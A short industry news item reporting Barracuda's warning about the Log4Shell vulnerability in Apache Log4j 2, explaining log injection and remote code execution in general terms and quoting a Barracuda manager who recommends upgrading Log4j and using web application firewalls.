Cloud security solutions provider Barracuda reported on a newly discovered RCE bug that increases the vulnerability of APAC businesses to log injection attacks.
Known as Log4Shell, it is a software vulnerability in Apache Log4j 2, a popular Java library for logging error messages in applications that various organisations use.
Logging is an important component of many applications and systems as developers and administrators use it to verify that software is functioning properly, and to determine specific details if it is not.
Log injection occurs when user-controlled input is logged without sanitation. Among a number of risky consequences (e.g., data leaks, log forgery, denial-of-service attacks), remote code execution (RCE) is the most serious. An attacker can execute code inside an application and get access and privileges available to the application. This may lead to data breaches while enabling attackers to penetrate a network and compromise systems and resources beyond what the application can access.
Log4Shell elicits a similar response: it allows a remote attacker to control a device on the Internet if it is running certain versions of Log4j 2. As it affects the most widely used logging framework on the Internet, it has been attributed the highest severity rating on the National Vulnerability Database as well as the Apache Software Foundation given the ease with which attackers can use it.
Mark Lukie, Barracuda Systems Engineer Manager, Asia-Pacific, said: “These kinds of attacks are often overlooked, which makes them particularly dangerous, posing a threat to both data and network security. Any application using logging — even if not using log4j 2 or even Java — should be checked for possible log injection attacks and proper data sanitisation practices. The best way to protect against Log4Shell specifically is to upgrade to the latest version of log4j. However, for long-term against RCE threats, businesses need to find the right Web Application Firewall (WAF) and WAF-as-a-Service solutions to protect against log injection attempts, including those related to ‘Log4Shell’.”
